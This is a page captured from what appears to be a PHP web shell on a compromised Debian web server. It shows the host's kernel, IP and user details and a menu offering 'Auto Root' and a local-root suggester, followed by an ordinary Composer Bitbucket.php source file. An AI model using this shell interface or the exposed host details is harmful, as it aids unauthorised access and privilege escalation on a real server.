Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.119
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
php /
Composer /
Util /
Delete
Unzip
Name
Size
Permission
Date
Action
AuthHelper.php
1.66
KB
-rw-r--r--
2016-11-03 17:43
Bitbucket.php
6.69
KB
-rw-r--r--
2016-11-03 17:43
ComposerMirror.php
1.75
KB
-rw-r--r--
2016-11-03 17:43
ConfigValidator.php
6.42
KB
-rw-r--r--
2016-11-03 17:43
ErrorHandler.php
2.24
KB
-rw-r--r--
2016-11-03 17:43
Filesystem.php
20.89
KB
-rw-r--r--
2016-11-03 17:43
Git.php
13.66
KB
-rw-r--r--
2021-05-09 23:44
GitHub.php
4.48
KB
-rw-r--r--
2016-11-03 17:43
GitLab.php
5.1
KB
-rw-r--r--
2016-11-03 17:43
NoProxyPattern.php
4.07
KB
-rw-r--r--
2016-11-03 17:43
Perforce.php
17.17
KB
-rw-r--r--
2016-11-03 17:43
Platform.php
2.52
KB
-rw-r--r--
2016-11-03 17:43
ProcessExecutor.php
3.4
KB
-rw-r--r--
2016-11-03 17:43
RemoteFilesystem.php
39.12
KB
-rw-r--r--
2016-11-03 17:43
Silencer.php
2.12
KB
-rw-r--r--
2016-11-03 17:43
SpdxLicense.php
570
B
-rw-r--r--
2016-11-03 17:43
StreamContextFactory.php
6.93
KB
-rw-r--r--
2016-11-03 17:43
Svn.php
8.37
KB
-rw-r--r--
2021-05-09 23:44
TlsHelper.php
6.59
KB
-rw-r--r--
2016-11-03 17:43
Save
Rename
<?php /* * This file is part of Composer. * * (c) Nils Adermann <naderman@naderman.de> * Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Composer\Util; use Composer\Factory; use Composer\IO\IOInterface; use Composer\Config; use Composer\Downloader\TransportException; /** * @author Paul Wenke <wenke.paul@gmail.com> */ class Bitbucket { private $io; private $config; private $process; private $remoteFilesystem; private $token = array(); const OAUTH2_ACCESS_TOKEN_URL = 'https://bitbucket.org/site/oauth2/access_token'; /** * Constructor. * * @param IOInterface $io The IO instance * @param Config $config The composer configuration * @param ProcessExecutor $process Process instance, injectable for mocking * @param RemoteFilesystem $remoteFilesystem Remote Filesystem, injectable for mocking */ public function __construct(IOInterface $io, Config $config, ProcessExecutor $process = null, RemoteFilesystem $remoteFilesystem = null) { $this->io = $io; $this->config = $config; $this->process = $process ?: new ProcessExecutor; $this->remoteFilesystem = $remoteFilesystem ?: Factory::createRemoteFilesystem($this->io, $config); } /** * @return array */ public function getToken() { return $this->token; } /** * Attempts to authorize a Bitbucket domain via OAuth * * @param string $originUrl The host this Bitbucket instance is located at * @return bool true on success */ public function authorizeOAuth($originUrl) { if ($originUrl !== 'bitbucket.org') { return false; } // if available use token from git config if (0 === $this->process->execute('git config bitbucket.accesstoken', $output)) { $this->io->setAuthentication($originUrl, 'x-token-auth', trim($output)); return true; } return false; } /** * @param string $originUrl * @return bool */ private function requestAccessToken($originUrl) { try { $json = $this->remoteFilesystem->getContents($originUrl, self::OAUTH2_ACCESS_TOKEN_URL, false, array( 'retry-auth-failure' => false, 'http' => array( 'method' => 'POST', 'content' => 'grant_type=client_credentials', ), )); $this->token = json_decode($json, true); } catch (TransportException $e) { if ($e->getCode() === 400) { $this->io->writeError('<error>Invalid OAuth consumer provided.</error>'); $this->io->writeError('This can have two reasons:'); $this->io->writeError('1. You are authenticating with a bitbucket username/password combination'); $this->io->writeError('2. You are using an OAuth consumer, but didn\'t configure a (dummy) callback url'); return false; } elseif (in_array($e->getCode(), array(403, 401))) { $this->io->writeError('<error>Invalid OAuth consumer provided.</error>'); $this->io->writeError('You can also add it manually later by using "composer config bitbucket-oauth.bitbucket.org <consumer-key> <consumer-secret>"'); return false; } throw $e; } } /** * Authorizes a Bitbucket domain interactively via OAuth * * @param string $originUrl The host this Bitbucket instance is located at * @param string $message The reason this authorization is required * @throws \RuntimeException * @throws TransportException|\Exception * @return bool true on success */ public function authorizeOAuthInteractively($originUrl, $message = null) { if ($message) { $this->io->writeError($message); } $url = 'https://confluence.atlassian.com/bitbucket/oauth-on-bitbucket-cloud-238027431.html'; $this->io->writeError(sprintf('Follow the instructions on %s', $url)); $this->io->writeError(sprintf('to create a consumer. It will be stored in "%s" for future use by Composer.', $this->config->getAuthConfigSource()->getName())); $this->io->writeError('Ensure you enter a "Callback URL" or it will not be possible to create an Access Token (this callback url will not be used by composer)'); $consumerKey = trim($this->io->askAndHideAnswer('Consumer Key (hidden): ')); if (!$consumerKey) { $this->io->writeError('<warning>No consumer key given, aborting.</warning>'); $this->io->writeError('You can also add it manually later by using "composer config bitbucket-oauth.bitbucket.org <consumer-key> <consumer-secret>"'); return false; } $consumerSecret = trim($this->io->askAndHideAnswer('Consumer Secret (hidden): ')); if (!$consumerSecret) { $this->io->writeError('<warning>No consumer secret given, aborting.</warning>'); $this->io->writeError('You can also add it manually later by using "composer config bitbucket-oauth.bitbucket.org <consumer-key> <consumer-secret>"'); return false; } $this->io->setAuthentication($originUrl, $consumerKey, $consumerSecret); $this->requestAccessToken($originUrl); // store value in user config $this->config->getConfigSource()->removeConfigSetting('bitbucket-oauth.'.$originUrl); $consumer = array( "consumer-key" => $consumerKey, "consumer-secret" => $consumerSecret, ); $this->config->getAuthConfigSource()->addConfigSetting('bitbucket-oauth.'.$originUrl, $consumer); // Remove conflicting basic auth credentials (if available) $this->config->getAuthConfigSource()->removeConfigSetting('http-basic.' . $originUrl); $this->io->writeError('<info>Consumer stored successfully.</info>'); return true; } /** * Retrieves an access token from Bitbucket. * * @param string $originUrl * @param string $consumerKey * @param string $consumerSecret * @return array */ public function requestToken($originUrl, $consumerKey, $consumerSecret) { if (!empty($this->token)) { return $this->token; } $this->io->setAuthentication($originUrl, $consumerKey, $consumerSecret); $this->requestAccessToken($originUrl); return $this->token; } }